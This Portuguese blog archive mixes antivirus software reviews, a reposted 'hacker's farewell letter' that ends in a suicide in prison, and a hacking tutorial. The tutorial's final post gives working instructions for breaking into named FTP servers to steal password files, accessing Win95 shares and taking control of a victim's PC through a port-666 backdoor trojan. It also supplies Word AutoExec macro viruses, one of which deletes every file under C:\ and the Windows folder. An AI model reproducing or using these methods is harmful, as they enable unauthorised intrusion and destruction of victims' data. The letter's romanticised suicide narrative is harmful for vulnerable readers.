Arquivo do blog

Pesquisar no blog

Total de visualizações

domingo, 3 de março de 2013

AVG Anti-Virus Free

  AVG Anti-Virus Free

O AVG continua com o título de antivírus mais baixado do Baixaki. Ao longo dos anos, ele conseguiu esse posto com seus recursos funcionais e, principalmente, com a eficiência na detecção e eliminação de malwares.
Depois de ter recebido consideráveis melhorias em seu desempenho na edição anterior (como arquivo reduzido e menor consumo de memória RAM), desta vez a desenvolvedora do aplicativo manteve o foco na segurança proporcionada pelo seu produto.
A versão 2013 deste antivírus acaba de sair do forno e traz uma reformulação em sua interface, novos recursos de proteção em nuvem e mecanismos para aumentar a segurança de acessos a redes Wi-Fi.

Novo visual

A novidade mais aparente do AVG Anti-Virus Free 2013 é a sua nova interface. O visual do antivírus ganhou uma coloração de fundo mais escura e seus detalhes, como botões e links, variam entre tons de verde. Outra peculiaridade desta nova edição é o seu suporte para computadores com telas sensíveis ao toque e a similaridade entre a aparência da sua tela principal com a nova interface do Windows 8.
A partir dessa tela, você acessa qualquer um dos componentes de segurança ou atualização. A interface está mais enxuta, com menos ícones, mas isso não significa que o AVG perdeu recursos. Ela apenas está mais simples para que você tenha uma interação mais amigável.
Agora, o programa não está mais dividido em seções. Assim, você encontra tudo o que precisa para proteger o seu PC em uma única janela. Logo que o antivírus é aberto, você se depara com as opções de iniciar a varredura da máquina e conferir as configurações de proteção para a navegação na web, para o recebimento e envio de email e sobre a privacidade da sua identidade.
Além disso, com um simples clique é possível acionar a central de atualização do programa, a qual pesquisa por novos bancos de dados e versões do aplicativo.

Na onda da nuvem

No atual mundo da tecnologia, existe uma tendência para que todos os tipos de programas sejam ou pelo menos contem com recursos baseados na computação em nuvem – também conhecida como cloud computing.
A versão 2013 do AVG conta com a função Protective Cloud Technology, a qual é responsável pelas atualizações automáticas para identificar e prevenir ameaças emergentes na internet – antes que elas cheguem ao seu PC.
Dessa forma, um novo malware pode ser detectado antes mesmo que ele conste nos banco de dados do antivírus instalado no seu computador. Além disso, esse mecanismo amplia a segurança de quem utiliza serviços de armazenamento online.

Na briga contra os malwares

Antivírus

O antivírus é uma das ferramentas mais importante de proteção do PC. O AVG possui um grande e vasto repositório de classes de detecção de vírus e cavalos de troia. Um destaque é a localização especial para regiões afetadas, o que melhora o funcionamento do programa para os usuários brasileiros.
Este antivírus é capaz de verificar todo o computador, uma pasta selecionada ou um arquivo específico – o que pode ser feito de maneira bem prática, por meio do menu de contexto.
Não é de hoje que o AVG também conta com um componente dedicado a verificar e eliminar rootkits, um tipo de malware extremamente perigoso. O AVG é capaz de verificar aplicativos, bibliotecas DLL e drivers de maneira rápida ou completa para livrar seu computador desse tipo de ameaça.

LinkScanner, Search-Shield e Surf-Shield

O LinkScanner marca as páginas encontradas por meio de buscas como seguras ou não. Ele é compatível com os mais populares buscadores, incluindo Google, Yahoo! e Bing. Com essa ferramenta, você sabe antes de clicar no link se uma página é confiável ou deve ser evitada.
O navegador também é protegido com o Search-Shield e o Surf-Shield. Qualquer redirecionamento oriundo de uma pesquisa é verificado antes de você abrir. Tais complementos podem detectar também sites vulneráveis e outras ameaças online.

Pesquisa segura e barra de ferramentas

A lista de componentes do AVG ainda contempla outros recursos para o seu navegador. O Secure Search é um mecanismo de busca para que você faça pesquisas mais seguras.
Já a barra de ferramentas do AVG oferece atalhos para sites com informações gerais sobre o nível de segurança da internet. Por exemplo, se você quer saber se um site é seguro, pode usar o AVG Threat Labs. Você digita o endereço e confere a reputação, baseada na opinião de outros usuários.

Proteção de identidade

Outro componente de segurança é o Identity Protection, que protege seus dados enquanto você navega pela internet. Ele monitora o modo como os programas se comportam no computador e bloqueia automaticamente qualquer atividade que possa levar ao roubo de suas informações pessoais.

Proteção de emails

Ainda encontramos a proteção de email, que verifica suas mensagens recebidas e também as enviadas para bloquear spam, vírus, ataques de phishing e demais práticas maliciosas.

Acesso facilitado

Se você usa o Windows 7, pode pesquisar na área de gadgets (clique com o botão direito na Área de trabalho, depois em “Gadgets” e o AVG deve aparecer em destaque). Com a ferramenta instalada, é possível fazer a verificação do computador e buscar atualizações, além de acessar as páginas do AVG no Twitter e no Facebook.
Essa é uma maneira muito prática para utilizar as mais básicas funcionalidades do AVG sem a necessidade de acessar a interface do antivírus. Se você já tem o hábito de utilizar gadgets, certamente esse vêm a calhar.

Configurações


O AVG não exige que você passe horas configurando o programa. A partir do momento em que ele é instalado, já começa a proteger seu computador. Mas ele não deixa os usuários mais rigorosos na mão, graças a uma extensa lista de configurações avançadas, que vão desde a aparência até o funcionamento detalhado do programa.
Cada componente pode ser configurado da melhor maneira que você julgar e, a qualquer momento, o programa pode voltar às configurações originais. Tudo o que o AVG registra é mantido no histórico. Esse menu dá acesso aos resultados da verificação e das detecções de proteção e também aos arquivos mantidos em quarentena.
 

Microsoft Security Essentials

Microsoft Security Essentials

4.2.223.1

Microsoft Security Essentials 4 é a nova versão do sistema antivírus da Microsoft. O programa, que fez grande sucesso desde seu lançamento, apresenta algumas melhorias pontuais e conseguiu simplificar ainda mais o visual que já faz dele um dos nomes mais populares quando o assunto são antivírus gratuitos.
A Microsoft mostra que está levando a sério a ideia de avançar ainda mais nesse frutífero mercado de segurança. Para isso, equipa seu antivírus com funções bem interessantes no que toca o aprimoramento da proteção e aumento de performance, tudo isso sem deixar de lado a leveza e a funcionalidade.

Desempenho e segurança aprimorados

Os grandes destaques desta versão são a proteção aprimorada por meio de remediação automática de malwares e também as melhorias de desempenho. Quanto à primeira novidade, o aplicativo é capaz de limpar automaticamente infecções altamente impactantes sem que seja necessário nenhum tipo de ação do usuário.
A questão do desempenho ganhou alguns recursos extras que permitem a você rodar o Microsoft Security Essentials sem que isso implique lentidão do sistema. A ideia dos desenvolvedores é que o aplicativo trabalhe a pleno vapor sem interferir na estabilidade do computador.

Novo motor de proteção

Outra novidade do Microsoft Security Essentials é um motor de proteção renovado e ainda melhor do que o anterior. A atualização do núcleo central do programa oferece um sistema de detecção aprimorado, com capacidade de limpar o PC em alta velocidade.

Bons recursos de sempre

Além de tudo isso, funções básicas como a criação de pontos de restauração, scan rápido ou completo e com possibilidade de agendamento, proteção em tempo real e escaneamento de dispositivos removíveis conectados ao computador estão presentes neste programa.

Download

Ao clicar em “Clique para baixar”, você faz download de um instalador. Caso tenha algum problema com este arquivo, acesse a central Microsoft Connect, crie um cadastro e faça login para poder acessar um novo arquivo de instalação do Microsoft Security Essentials.

http://download.microsoft.com/download/4/1/5/415CADB4-C974-4DB7-9C44-565EEEBF5509/PTBR/x86/MSEInstall.exe

Comodo Internet Security Premium x86

Comodo Internet Security Premium 

é um aplicativo que reúne uma série de recursos para a proteção do seu computador contra vírus e outras pragas virtuais.
Ele traz ferramentas como antivírus, ambiente seguro e diversos tipos de proteção em tempo real, sendo uma solução integrada para computadores pessoais.
Logo após instalar o programa, ele deve realizar a atualização da base de dados. Embora seja um procedimento um pouco demorado, é essencial que ele seja concluído para garantir a segurança do seu computador.

Extras e opcionais

Logo no começo da instalação, são oferecidas algumas opções para você. Uma tela traz três alternativas, sendo que a primeira delas pergunta se você deseja trocar o seu DNS atual por um da Comodo, com o objetivo de aumentar a sua segurança durante a navegação na internet. A segunda solicita permissão para enviar o comportamento de programas “estranhos” para análise baseada em tecnologia nas “nuvens”.
Ambas são funções do programa que ficam ao seu critério se você deseja ou não a ativação. Já a terceira alternativa serve para transformar o Yahoo! na página inicial e no mecanismo-padrão de pesquisa do seu navegador. Para dar sequência ao processo, basta desmarcar as opções indesejadas e prosseguir normalmente com a instalação.

No mesmo programa

Há algum tempo, os aplicativos para realizar a segurança do computador eram divididos em grandes áreas, como específicos para firewalls, antivírus e anti-spywares. Porém, como a forma de proteção necessária para um computador ligado à internet sofreu mudanças, muitos desenvolvedores começaram a criar soluções integradas.
O Comodo Internet Security Premium representa uma dessas aplicações na qual você encontra várias ferramentas de segurança em uma única interface.

Informações gerais

A interface do programa sofreu mudanças ao longo dos anos, mas está bem semelhante àquela apresentada na versão Beta do aplicativo. De uma forma geral, ela é elegante, além de adotar padrões de cores mais vibrantes e estar mais limpa e focada na exibição dos seus recursos. Logo ao abrir o aplicativo, você pode ter uma visão do seu sistema e o que merece atenção.
Ali, é informado, por exemplo, se o computador está precisando efetuar uma verificação (pois a última pode ter sido executada há muito tempo), se a base de dados está precisando de novas atualizações etc. Da mesma forma, você pode fazer uma verificação por vírus em um arquivo específico “arrastando-o” até o campo disponível nessa tela.

Verificação por vírus

O botão “Scan” é responsável pela função de fazer uma varredura geral do seu computador em busca de vírus e outras ameaças virtuais. O programa oferece quatro tipos de verificação. “Quick scan” seria uma análise rápida, levando em conta apenas os setores críticos (e mais sujeitos a infecções) do computador.
O “Full scan” faz uma varredura de todo o computador em busca de ameaças. Este modo costuma tomar um pouco de tempo para ser concluído. O modo “Rating scan” apresenta uma verificação tendo como base os arquivos que são considerados mais perigosos pela base de conhecimento “nas nuvens” do programa.
Já a “Custom scan” permite que você defina o que deseja verificar no computador. Independente da alternativa desejada, após clicar nela o programa inicia automaticamente a análise e, caso encontre alguma ameaça, oferece as alternativas possíveis para você se livrar do inconveniente.

Virtual Kiosk

Essa é uma função que seria uma espécie de um “ambiente virtual seguro”. Ao entrar no “Virtual Kiosk”, uma nova Área de trabalho é aberta no seu computador, de maneira que você pode efetuar várias tarefas sem se preocupar com invasões ou qualquer tipo de problema relacionado a malwares e ameaças virtuais.
Veja que esse desktop possui uma série de aplicações que podem ser utilizadas normalmente, incluindo alguns dos atalhos da sua Área de trabalho normal do computador.

Ferramentas adicionais

O aplicativo também oferece um gerenciador de tarefas interno, para que você possa controlar quais ações estão sendo tomadas por ele e o tempo utilizado para cada uma delas. Além disso, ele traz o “Game mode”, que pode ser ativado utilizando o botão presente na sua interface. Ele serve para não exibir notificações e desativar a proteção em tempo real.
Assim, você pode jogar sem o inconveniente de haver “minimizações” da tela ou interrupções e travamentos causados pelo aplicativo. Porém, seu computaedor não deixa de ficar protegido, mantendo as proteções em tempo real ativadas.

Além da interface central, o Comodo Internet Security Premium também oferece um widget para a Área de trabalho que analisa o tráfego da internet e apresenta atalhos para executar os navegadores no ambiente de “Sandbox”
baixar arquivo

Antivirus-avast! Free Antivírus 8

avast! Free Antivírus 8

avast! Free Antivírus 8 traz mais uma opção de aplicativo para manter o seu computador protegido contra vírus e outras pragas virtuais.
O principal objetivo do programa é prevenir contaminações na máquina por meio das proteções em tempo real, além de tratar possíveis infecções já instaladas no disco rígido.
O programa é completamente gratuito para o uso, mas é preciso escolher a opção correspondente ao antivírus na hora da instalação (como será explicado abaixo).

Instalação, itens extras e registro

Ao começar a instalação do programa, logo no início do processo, ele pergunta se você deseja instalar o antivírus ou a suíte de segurança (Avast! Internet Security). Para instalar o antivírus, clique no botão “Instalar o avast! Free Antivírus”.

Em seguida, uma nova tela é exibida oferecendo a possibilidade de você instalar o aplicativo do Google Drive no seu computador. Caso você não queira realizar a ação, selecione a alternativa “Instalação personalizada” e desmarque a opção “Sim, instalar o Google Drive”.

Feito isso, basta prosseguir com a instalação normalmente. Ao final, o programa solicita que você registre o produto e é possível tanto fazê-lo criando uma conta com o seu email ou o seu login do Facebook, clicando na alternativa que esteja de acordo com o que você quer fazer.

Abrindo o programa

Ao entrar no programa, a tela principal é aberta, apresentando todos os módulos de funções disponíveis no avast! Internet Security na forma de botão. Por isso, você percebe que algumas delas estão desativadas no antivírus (como o Firewall e o SafeZone). A partir dessa janela, você pode acessar a análise por vírus, a ferramenta de atualização de programas instalados e o setor de estatísticas.
Tela inicial
Se você clicar na aba ao lado, “Segurança”, é exibido na tela o estado do computador (em “Resumo”). Além disso, na alternativa “Estatísticas”, você pode ver um gráfico das atividades exercidas pelos módulos do programa, apenas selecionando aquele que você quiser ver.

Análise do computador em busca de infecções

A busca de vírus pode ser acessada tanto a partir da tela inicial, como já citado, como na aba “Segurança”, por meio da alternativa “Antivírus” (na opção “Escaneamento”). O programa oferece cinco tipos de verificação. Por meio do “Escaneamento rápido”, você pode fazer uma varredura apenas dos setores críticos do computador, tomando menos tempo.
“Escaneamento completo do sistema” oferece a análise profunda do computador. Esse procedimento costuma demorar um pouco mais, mas vale a pena executá-lo de tempos em tempos para garantir a segurança da máquina. Caso deseje, você também pode verificar apenas dispositivos de armazenamento externos (pendrives e HDs externos, por exemplo), na opção “Escaneamento da mídia removível”.
Escolha a análise
Da mesma forma, também é possível varrer apenas diretórios específicos (em “Selecione uma pasta para escanear”) ou agendar a verificação para quando o computador for reiniciado (por meio da opção “Escaneamento ao reiniciar”). Independente da opção escolhida (com exceção da última, que gera um agendamento), após clicar no botão do processo, a análise é imediatamente iniciada.
O andamento da operação pode ser acompanhado em tempo real por meio da exibição de uma barra de progresso e dos arquivos que estão sendo rastreados. Ao final do procedimento, o programa exibe uma lista com os resultados. Se houver alguma ocorrência, você pode selecioná-la e solicitar que o programa tome a ação necessária para resolver o problema.

Atualização de programas e outras ferramentas

No setor de segurança, também está disponível uma ferramenta para você atualizar os programas instalados no computador. Essa função é acessada por meio do botão “Software Updater” e, logo ao clicar no botão citado, você pode observar que o aplicativo monta uma lista com todos eles.
Atualizando os programas instalados
Caso você deseje atualizar a lista, basta clicar no botão “Escaneando” para que ele realize uma nova verificação. Em cada item você pode observar o seu estado (atualizado ou não) e, sempre que houver alguma atualização pendente, é possível clicar em “Corrigir”. Isso faz com que você acesse a página do desenvolvedor da aplicação e possa baixar a versão mais recente do programa.
Este aplicativo também conta com ferramentas adicionais que podem ser encontradas por meio do botão “Ferramentas”. Ali, você encontra e baixa um aplicativo para fazer o bloqueio de sites suspeitos (uma espécie de função para montar uma “lista negra”) e atalhos para baixar outras ferramentas da avast!.

Quarentena e relatórios

Caso você queira observar os arquivos que foram identificados como suspeitos e mandados para a imunização, basta acessar a aba “Manutenção” e clicar em “Quarentena”. De tempos em tempos, é bom acessar este setor do aplicativo, pois a cada dia surgem novas soluções para pragas virtuais mais antigas, podendo já haver uma forma de descontaminação disponível no aplicativo.

Outra função interessante que pode ser encontrada no setor de manutenção são os relatórios (em “Logs de escaneamentos”). Ali, você pode visualizar uma lista com as atividades de análise realizadas pelo programa, além de abrir os registros para ler os resultados obtidos na verificação.

quinta-feira, 28 de fevereiro de 2013

Dominio de Graça

A carta de despedida de um hacker

A carta de Adeus de um Hacker

Leia com muita atenção o texto abaixo, pois é a historia de como amei a vida e porque desisti dela (autor desconhecido).
Um adolescente normal como qualquer outro, mas com uma visão da vida pela qual muitos teriam o invejado, ele não tinha muitos amigos mas era feliz, ele não tinha uma relação com seus irmãos da maneira tradicional (ou são os melhores amigos ou os piores inimigos). Recebeu uma criação invejável, podia sair e voltar de casa a hora que quisesse, e recebia dos pais toda a atenção que necessitava. Apesar disso não saia de casa com a freqüência de um adolescente normal, não pelo fato de ser anti-social, muito pelo contrario fazia amizades muito fácil, e também não era um nerd, muito pelo contrario era o tipo do aluno vagal do qual os professores se reuniam para falar mau, gostava de entrar em brigas e odiava ir para a escola aprender as mesmas coisas todo dia. As coisas entravam muito fácil em sua cabeça, bastava uma ou duas vezes e pronto já estava decorado. Odiava a historia com tanta injustiça, escravidão dos negros (apesar dele ser branco), preconceito contra índios, judeus ou estrangeiros. Esse garoto que não tinha uma vida muito agitada, cheia de amigos e viagens. Sempre agradecia a "deus" pôr Ter uma vida tão boa, era feliz, fazia o que gostava, não tinha nenhuma doença , seus pais e familiares estavam vivos e com saúde e acreditava Ter nascido no ano certo pois estava acompanhando todo o desenvolvimento da tecnologia. Ele tinha uma vida que para outras pessoas de sua idade seria o maior tédio (mas ele adorava), Seu único medo era saber do inevitável... que um dia isso iria acabar. Talvez com a morte dos pais ou com um acidente que deixaria ele incapacitado. Esse garoto um dia se deparou com uma maquina incrível que quase não tinha limites se bem utilizada... um computador. Ele estudou muito, se formou duas vezes (Engenharia da computação e ciência da computação) eu nem preciso dizer que ele era um Hacker. Seu nome não interessa, o que ele tinha em mente? Mudar o mundo, um hacker solitário que durante dois anos (logo após a segunda formatura) se dedicou a invadir e roubar informações confidenciais dos militares americanos. Ele tinha em mente roubar informações, entender essas informações e depois divulga-las. Ele quase consegue alcançar o seu objetivo. Ele reuniu algumas informações que vão de fotos de possíveis alienígenas até plantas de equipamentos como computador, só que com uma tecnologia que possivelmente só estará disponível ao publico daqui a dez anos. Seu erro foi que depois de invadir sistemas militares os quais não podia ficar dentro mais de um minuto, ele ficou auto confiante demais, e quando estava em casa montando uma pequena home page que iria mostrar ao publico todas as informações que ele roubou, foi parado pôr agentes federais que o pegaram as 3:40h de algum dia do ano de 1996.
Você não vai encontrar nos jornais sobre mim, apenas algumas linhas que dizem "policia pega vândalo destruindo telefones públicos e descobre em sua casa centenas de cartões de créditos falsos". Eu NUNCA falsifiquei NENHUM cartão de credito, meu único ato criminoso foi invadir sistemas do governo e copiar informações confidenciais. Fui condenado a 7 anos de prisão sem direito a condicional, e fui proibido de usar computadores para o resto da vida. Outro dia eu li no jornal sobre dois garotos que mataram um mendigo queimado enquanto dormia, e que um deles era filho de um juiz criminal. Hoje pego o jornal e leio "Garotos confessam o crime mas não vão a julgamento". Chega eu cansei de viver em um mundo onde assassinos ficam nas ruas enquanto aqueles que estão em busca de um mundo melhor ficam na cadeia, cansei de Ter que aceitar o fato de que estou privado daquilo que eu amo e faço melhor, ser um hacker... Cansei de saber que os nossos governantes querem um povo ignorante o qual eles possam manipular e enganar, dizendo que estamos na terra da liberdade. Um pais que tem uma tecnologia dez anos afrente da atual, que se fosse mostrada ao publico não adiantaria o mundo em dez anos, mas com as novas descobertas em cima dessa tecnologia poderiam levar o mundo 20 talvez 30 anos afrente. Estou cansado de viver em um mundo onde o nosso próprio governo nos nega uma evolução, para poder Ter os melhores equipamentos militares que garantem a sua superioridade perante os outros países. Agora eu pergunto, como com tudo isso eles ainda podem falar sobre globalização? Hoje eu tenho vergonha de ser americano.
"Agora só me resta a esperança de que um dia, os Hackers do mundo se uniram e mostraram ao mundo... A verdade."
Quando vocês lerem isto eu já estarei morto, mas como suspiro final, digo que tenho copias escondias de tudo que descobri, e a mesma pessoa que colocara o meu manifesto na rede também colocara todas as informações pelas quais eu fui preso.
"Agora eu morro feliz pois a verdade em breve estará na boca do povo!"
Ass:
O hacker foi encontrado em sua cela com os pulsos cortados, foi levado ao hospital do presidio onde morreu as 04:32h do dia primeiro de janeiro de 1998. O seu amigo que ficou encarregado de colocar seu manifesto e as outras informações na rede, foi até o local indicado, onde estariam as copias dos arquivos confidenciais, mas foi pego pela policia federal e respondeu a processo. Foi obrigado a pagar multa no valor de US$ 80.000

sexta-feira, 1 de fevereiro de 2013

Em primeiro lugar quero deixar bem claro que não me responsabilizo por qualquer acto cometido por informações extraídas destes documentos. Tudo o que você fizer é de sua inteira responsabilidade.

  Saber de uma determinada matéria (seja ela qual for) não é nem nunca foi crime.

        
    1º) Várias são as fantasias e a imaginação das pessoas sobre as diversas figuras  assustadoras que navegam no mundo virtual. Vamos começar por definir o que são e quem são estas figuras:

    Hacker: Aquele que tem conhecimentos profundos de sistemas operacionais e linguagens de programação. Conhece as falhas de segurança dos sistemas e está sempre à procura de novas falhas para posterior invasão. Utiliza os seus conhecimentos sem praticar o mal.

     Cracker:  O mesmo que "hacker", com a diferença de utilizar seus conhecimentos para o "mal". Destruir e roubar são as suas palavras de ordem.

     Lamer: É na verdade o chamado otário. Cada um acha uma pessoa otária por um motivo. Mas neste caso, é otário, porque chateia os outros. Anuncia aos quatro cantos as burrices que faz, e acha-se o máximo.

     Wannable: É o principiante que já aprendeu a usar os programas preparados pelos verdadeiros "hackers".

     Cavalo de Tróia (Trojan Horse): Semelhante ao famoso presente dos troianos, onde dentro do belo cavalo de madeira, estavam escondidos centenas de soldados prontos para atacar a cidade presenteada, programas úteis ou inúteis, ou simples jogos, possuem dentro deles, códigos capazes de não só executar a função proposta, como também, destruir, armazenar, ou copiar informações do sistema. Temos como exemplo, programas que imitam "login" de um provedor e armazenam esta informação em locais onde posteriormente o "curioso" poderá recuperá-la facilmente..
 
     Backdoors: São passagens secretas, ou "porta dos fundos", isto é, senha secreta criada pelo autor do "software", não documentada, é claro, que independente do administrador do sistema pode ser usada para acessar ilimitadamente a todos os recursos disponíveis. Farejamento de Redes: utilizando-se do empacotamento das mensagens nas redes de computadores, programas especialistas procuram neles palavras como "password" e "senha". Quando encontradas, o programa copia o pacote e envia-o para o computador do "hacker", que então se utiliza de técnicas próprias para tentar descodificá-las, pois as senhas estão todas “criptografadas".

     Invasão de servidores:  Através de "ftp" anónimo, pode-se roubar o arquivo que contêm as "passwords" dos usuários e, através de técnicas de tentativa de "decriptografias", obter "passwords" deste provedor.

    2º) Invasões
   a) Invasão por FTP:           
 
     Para Hackear em FTP, primeiro você deve saber o endereço do Host ou seu IP, para isso use o IPSCAN, digitando o IP Principal do Host:
    Lista de Alguns FTP's :
    ftp.mandic.com.br    ftp.bestway.com.br    ftp.internetclub.com.br    ftp.netscape.com    ftp.angelfire.com
    Let's HaCk !!!
    Vá ao MS-DOS e digite FTP, ao aparecer o prompt ftp>, digite OPEN, irá abrir um outro Prompt (to), digite o nome do host ou o IP, tipo (to) ftp.mandic.com.br. Ao conectar, ele pedirá a senha e a Password, tente usar os passwords UNIX, se não der você deve entrar INVISÍVEL!
 
      Como entrar Invisível?
    No login pressione ENTER, no password pressione novamente ENTER, irá aparecer o prompt ftp> novamente...., ai é só digitar... quote user ftp , pressione ENTER e digite: quote cwd ~root,  pressione ENTER novamente e digite: quote pass ftp
    Pronto, você está Hackeando... Mas tem um porém..., se escrever amensagem : user restriction aplly, você não esta Hackeando.., pois estáaplicada a protecção, para isto tente com outro user tipo quote cwd ~sys eos outros da lista UNIX....
   
    Meu Deus... eu entrei e agora o que faço? 
   
    Ao entrar você vai estar no Directório do login, tipo \home\root\,
    Dê cd\etc e você vai estar no lugar certo. Aí é consigo, descubra o quefazer. Se você tiver o arquivo de senhas, este vai estar criptografado, você vai precisar de um aplicativo para o descriptografar, tipo o Crack Jack .
 
    Não me responsabilizo por actos cometidos nos hosts... O problema é de quem hackeia, e não meu. Tome cuidado e nunca apague nada!!!
 
 
 
    b) Invasão por IP: 
 
     Todos os que utilizam a rede Dial-Up do Win95 (em desuso) para a sua conexão com a internet podem estar a correr sérios riscos a não ser, é claro, que assim se conectem propositadamente, com intenções"diversas". Utilizar-se de uma conexão PPP do Win95 num provedor de acesso, significa estar a disponibilizar o seu computador a todos os usuário da internet. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja a utilizar esse tipo de conexão. Conecte-se à Internet utilizando a rede Dial- Up do Win95. Se o seu provedor não disponibilizar uma conexão do tipo PPP, estas dicas não funcionarão. Verifique antes, se você possui os drivers  - clientes para redes Microsoft -. Caso não estejam instalados, instale-os através do Painel de Controlo, no ícone Redes. Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se estiver, você estará sujeito a que outra pessoa se conecte ao seu computador simplesmente sabendo o seu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS , é accionado automaticamente na procura de computadores que possuem IPs dinâmicos.
  
     Configurar essas opções é simples. Vá ao Painel de Controlo e abra Rede. Verifique as propriedades do protocolo TCP/IP. Aí você encontrará a opção para activar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Estes servidores são dos E.U.A, e são gratuitos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa de criar um arquivo de texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir a sua NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP do seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela do MS-DOS. Através do Explorer você poderá ver os computadores disponíveis na rede, dos quais você ainda poderá utilizar os discos, mapeando-os, o que os tornará unidades do seu computador.
 
 
   c) Invasão pela porta 666
  
      É uma invasão fácil, mas no entanto, você irá precisar do programa Aabout . E a víctima também.
    Procedimento:
    Primeiro você deve contactar a vítima e fazê-la executar o programa Aabout, depois entre no telnet do Windows (C:\windows\telnet.exe). Vá ao menu Conectar e clique em Sistema Remoto. Vai aparecer uma tela para o login. Como host, coloque o IP dinâmico da vítima e como porta, digite 666.   Clique em conectar. No login, digite a palavra gr! (é 'gr' com o ponto de exclamação)
    Agora aparece um PROMPT, no qual você tem controle total sobre o PC da vítima.   Use os comandos do DOS.

      3º) Fazer vírus de macro:
 
    Ainda hoje existe muita gente que só é capaz de abrir o Word, editar,negritar, sublinhar e mandar imprimir. Muitos milhares de pessoas só sabemmexer no básico mesmo. Eles nem imaginam o que existe por de trás desteriquíssimo processador de texto.
    Esta matéria tem como objectivo fazer desde pequenas até grandessacanagens com usuários burros.
PS: Software/versão abrangida: Word da Microsoft, versões 6 (win3.11)e 7.0 (win95).
    O Word possui um arquivo chamado "normal.dot" onde estão todasas configurações padrão do Word. Se por algum motivo este arquivo forapagado do computador, o Word cria-o outra vez automaticamente quando for reiniciado.
 
Níveis de sacanagem :
Nível 1..... Apenas uma brincadeiraNível 2..... Apenas uma brincadeira de mau gostoNível 3..... Não é mais brincadeira!!!
 
Primeiro você precisa de criar uma macro... siga os passos:Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(activo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatório) este macro é iniciado todas as vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiverem  (Sub MAIN e End Sub) e cole a rotina que está mais abaixo.
    PS: Existem outras formas/meios de criar uma macro, mas esta é mais simples.
   
 
    Nível 1
   
    O nível 1 serve para você dar nas vistas, mostrando que entende do Wordmelhor do que ninguém.    Cada vez que o usuário iniciar o Word receberá uma mensagem de alertaou qualquer outra mensagem que você queira. Veja abaixo.
    Sub MAIN    MsgBox "Você ‚ é otário! Eu não irei prosseguir com o sistema", "Microsoft Word", 5    MsgBox "Usuário Pirata Detectado", "FATAL ERROR", 16    MsgBox "Vai dormir e deixa-me descançar ", "Net Killers", 64    End Sub
 
 
Nível 2
    O Nível 2 é para deixar o usuário irritadíssimo.    No corpo da macro cole este texto abaixo:
    Sub MAIN    ArquivoNovoPadrão    Inserir "Shadow"    ArquivoNovoPadrão    Inserir "Net"    ArquivoNovoPadrão    Inserir "Killer"    ArquivoNovoPadrão    Inserir "Shadow Net Killer "    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão
    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão
   Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão
    Inserir "."    ArquivoNovoPadrão    Inserir "."    ArquivoNovoPadrão
    Inserir "Shadow Net Killer "    End Sub
 
    Nível 3
    O Nível 3, bom este nível é pura sacanagem, com ele um simples clique do rato, etudo desaparece! Isso mesmo "del *.*" ou apenas os documentos, você é que escolhe.
    Sub MAIN    Kill "C:\*.*"    Kill "C:\WINDOWS\*.*"    Kill "C:\WINWORD\*.*"    End Sub
 
      Lembre-se de que estes macros, são gravados no arquivo default do Word, ou seja no 'normal.dot' se este arquivo for apagado, o Word cria-o outra vez automaticamente quando este for reiniciado, então se você for fazer estas sacanagens , proteja este arquivo, com o comando 'attrib +r'.